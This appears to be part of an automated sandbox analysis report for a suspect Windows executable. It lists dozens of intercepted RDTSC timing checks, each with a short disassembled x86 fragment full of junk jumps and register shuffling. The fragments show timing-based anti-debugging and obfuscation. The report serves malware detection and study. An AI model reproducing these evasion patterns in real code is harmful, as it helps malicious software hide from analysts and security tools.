Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC04AE second address: 6EC0529 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2BDCD5A7B2h 0x00000008 sbb eax, 6050BE58h 0x0000000e jmp 00007F2BDCD5A7ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F2BDCD5A7B2h 0x00000021 jmp 00007F2BDCD5A7B5h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F2BDCD5A7B0h 0x0000002d xor eax, 27988318h 0x00000033 jmp 00007F2BDCD5A7ABh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0529 second address: 6EC055D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDC8ABB1Fh 0x00000009 adc ax, FFDEh 0x0000000e jmp 00007F2BDC8ABB29h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC055D second address: 6EC058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, edi 0x00000008 jmp 00007F2BDCD5A7ACh 0x0000000d push dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2BDCD5A7B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC058C second address: 6EC05AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 5238h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr fs:[00000030h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2BDC8ABB1Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC05AA second address: 6EC05C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2BDCD5A7B1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC05C0 second address: 6EC05DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [eax+18h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2BDC8ABB23h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC05DF second address: 6EC05E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC05E5 second address: 6EC05E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC05E9 second address: 6EC05ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0607 second address: 6EC067C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 sbb ecx, 7E3C6396h 0x0000000f jmp 00007F2BDC8ABB21h 0x00000014 popfd 0x00000015 mov ax, 2807h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov esi, eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F2BDC8ABB24h 0x00000025 adc al, FFFFFFE8h 0x00000028 jmp 00007F2BDC8ABB1Bh 0x0000002d popfd 0x0000002e popad 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F2BDC8ABB25h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC067C second address: 6EC068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC068C second address: 6EC06BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F2C4CECAB21h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2BDC8ABB25h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC06BA second address: 6EC0768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F2BDCD5A7ADh 0x00000012 adc ecx, 20C34A76h 0x00000018 jmp 00007F2BDCD5A7B1h 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F2BDCD5A7AEh 0x00000025 jmp 00007F2BDCD5A7B5h 0x0000002a popfd 0x0000002b mov di, si 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esi], edi 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 pop edx 0x00000036 mov bx, cx 0x00000039 popad 0x0000003a pushfd 0x0000003b jmp 00007F2BDCD5A7AEh 0x00000040 sub ax, E128h 0x00000045 jmp 00007F2BDCD5A7ABh 0x0000004a popfd 0x0000004b popad 0x0000004c mov dword ptr [esi+04h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F2BDCD5A7B5h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0768 second address: 6EC0794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007F2BDC8ABB1Eh 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0794 second address: 6EC07F8 instructions: 0x00000000 rdtsc 0x00000002 mov si, 48F5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c pushad 0x0000000d jmp 00007F2BDCD5A7AEh 0x00000012 mov eax, 3E0126E1h 0x00000017 popad 0x00000018 mov dword ptr [esi+10h], eax 0x0000001b jmp 00007F2BDCD5A7ACh 0x00000020 mov eax, dword ptr [ebx+50h] 0x00000023 jmp 00007F2BDCD5A7B0h 0x00000028 mov dword ptr [esi+14h], eax 0x0000002b pushad 0x0000002c mov ecx, 50D420FDh 0x00000031 mov ah, CFh 0x00000033 popad 0x00000034 mov eax, dword ptr [ebx+54h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F2BDCD5A7B0h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC07F8 second address: 6EC0875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2DB8A1B4h 0x00000008 pushfd 0x00000009 jmp 00007F2BDC8ABB1Dh 0x0000000e adc esi, 64E81576h 0x00000014 jmp 00007F2BDC8ABB21h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esi+18h], eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 mov bx, B5FEh 0x00000026 pop ebx 0x00000027 mov di, cx 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+58h] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F2BDC8ABB23h 0x00000037 xor eax, 0CDF0B5Eh 0x0000003d jmp 00007F2BDC8ABB29h 0x00000042 popfd 0x00000043 mov di, ax 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0875 second address: 6EC0923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDCD5A7B3h 0x00000009 adc ecx, 6CE7A56Eh 0x0000000f jmp 00007F2BDCD5A7B9h 0x00000014 popfd 0x00000015 call 00007F2BDCD5A7B0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+1Ch], eax 0x00000021 jmp 00007F2BDCD5A7B1h 0x00000026 mov eax, dword ptr [ebx+5Ch] 0x00000029 jmp 00007F2BDCD5A7AEh 0x0000002e mov dword ptr [esi+20h], eax 0x00000031 jmp 00007F2BDCD5A7B0h 0x00000036 mov eax, dword ptr [ebx+60h] 0x00000039 pushad 0x0000003a mov si, 018Dh 0x0000003e push esi 0x0000003f mov di, 21BCh 0x00000043 pop edx 0x00000044 popad 0x00000045 mov dword ptr [esi+24h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2BDCD5A7B7h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0923 second address: 6EC0929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0929 second address: 6EC092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC092D second address: 6EC0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0931 second address: 6EC0954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c movsx ebx, cx 0x0000000f mov ebx, esi 0x00000011 popad 0x00000012 mov dword ptr [esi+28h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2BDCD5A7AAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0954 second address: 6EC095A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC095A second address: 6EC096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDCD5A7ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC096B second address: 6EC0A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e jmp 00007F2BDC8ABB1Eh 0x00000013 mov dword ptr [esi+2Ch], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2BDC8ABB1Eh 0x0000001d jmp 00007F2BDC8ABB25h 0x00000022 popfd 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F2BDC8ABB1Eh 0x0000002a xor eax, 6A8DB988h 0x00000030 jmp 00007F2BDC8ABB1Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F2BDC8ABB28h 0x0000003c adc al, FFFFFFE8h 0x0000003f jmp 00007F2BDC8ABB1Bh 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 mov ax, word ptr [ebx+6Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F2BDC8ABB20h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0A20 second address: 6EC0A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0A24 second address: 6EC0A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0A2A second address: 6EC0A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F2BDCD5A7B0h 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2BDCD5A7B7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0A70 second address: 6EC0AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2BDC8ABB1Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0AA0 second address: 6EC0AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0AA6 second address: 6EC0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0AAA second address: 6EC0B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F2BDCD5A7B5h 0x00000015 add ch, FFFFFF86h 0x00000018 jmp 00007F2BDCD5A7B1h 0x0000001d popfd 0x0000001e push eax 0x0000001f pushfd 0x00000020 jmp 00007F2BDCD5A7B7h 0x00000025 sub cx, 66BEh 0x0000002a jmp 00007F2BDCD5A7B9h 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov dword ptr [esi+34h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F2BDCD5A7B8h 0x0000003d mov cx, 1901h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0B41 second address: 6EC0C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2BDC8ABB24h 0x00000013 adc ah, 00000078h 0x00000016 jmp 00007F2BDC8ABB1Bh 0x0000001b popfd 0x0000001c mov bh, ah 0x0000001e popad 0x0000001f mov dword ptr [esi+38h], eax 0x00000022 jmp 00007F2BDC8ABB1Bh 0x00000027 mov eax, dword ptr [ebx+1Ch] 0x0000002a jmp 00007F2BDC8ABB26h 0x0000002f mov dword ptr [esi+3Ch], eax 0x00000032 pushad 0x00000033 mov bh, cl 0x00000035 push edi 0x00000036 mov ax, 6495h 0x0000003a pop eax 0x0000003b popad 0x0000003c mov eax, dword ptr [ebx+20h] 0x0000003f jmp 00007F2BDC8ABB21h 0x00000044 mov dword ptr [esi+40h], eax 0x00000047 jmp 00007F2BDC8ABB1Eh 0x0000004c lea eax, dword ptr [ebx+00000080h] 0x00000052 jmp 00007F2BDC8ABB20h 0x00000057 push 00000001h 0x00000059 jmp 00007F2BDC8ABB20h 0x0000005e nop 0x0000005f jmp 00007F2BDC8ABB20h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F2BDC8ABB1Eh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0C2A second address: 6EC0CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2BDCD5A7B6h 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 jmp 00007F2BDCD5A7B0h 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F2BDCD5A7AEh 0x0000001f jmp 00007F2BDCD5A7B5h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F2BDCD5A7B0h 0x0000002b adc ch, 00000078h 0x0000002e jmp 00007F2BDCD5A7ABh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exe RDTSC instruction interceptor: First address: 6EC0CB2 second address: 6EC0CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CB6 second address: 6EC0CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CBC second address: 6EC0CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CC2 second address: 6EC0CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CC6 second address: 6EC0CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0CCA second address: 6EC0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F2BDCD5A7ACh 0x00000011 pop ecx 0x00000012 mov ah, dl 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D1C second address: 6EC0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D20 second address: 6EC0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D26 second address: 6EC0D4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, D80Ch 0x00000011 jmp 00007F2BDC8ABB25h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D4D second address: 6EC0D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007F2BDCD5A7B8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F2C4D3790FBh 0x00000014 jmp 00007F2BDCD5A7B0h 0x00000019 mov eax, dword ptr [ebp-0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D8D second address: 6EC0D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0D91 second address: 6EC0DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DAE second address: 6EC0DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A3E2h 0x00000007 pushfd 0x00000008 jmp 00007F2BDC8ABB23h 0x0000000d xor ecx, 765BECDEh 0x00000013 jmp 00007F2BDC8ABB29h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DF5 second address: 6EC0DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DF9 second address: 6EC0DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0DFF second address: 6EC0E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2BDCD5A7B7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0E31 second address: 6EC0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0E37 second address: 6EC0E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2BDCD5A7B4h 0x00000014 sbb ax, 50C8h 0x00000019 jmp 00007F2BDCD5A7ABh 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 push edx 0x00000024 jmp 00007F2BDCD5A7B0h 0x00000029 mov dword ptr [esp], eax 0x0000002c pushad 0x0000002d jmp 00007F2BDCD5A7AEh 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0F8A second address: 6EC0F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0F9F second address: 6EC0FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0FA3 second address: 6EC0FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007F2BDC8ABB1Dh 0x0000000f test edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2BDC8ABB1Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0FCB second address: 6EC0FFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F2C4D378E7Fh 0x0000000f jmp 00007F2BDCD5A7AEh 0x00000014 mov eax, dword ptr [ebp-04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC0FFD second address: 6EC1001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1001 second address: 6EC1005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1005 second address: 6EC100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC100B second address: 6EC1011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1011 second address: 6EC1015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1015 second address: 6EC1075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f push ecx 0x00000010 pushfd 0x00000011 jmp 00007F2BDCD5A7ABh 0x00000016 or eax, 4B33722Eh 0x0000001c jmp 00007F2BDCD5A7B9h 0x00000021 popfd 0x00000022 pop eax 0x00000023 popad 0x00000024 lea eax, dword ptr [ebx+70h] 0x00000027 jmp 00007F2BDCD5A7B7h 0x0000002c push 00000001h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1075 second address: 6EC1090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1090 second address: 6EC1096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1096 second address: 6EC109A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
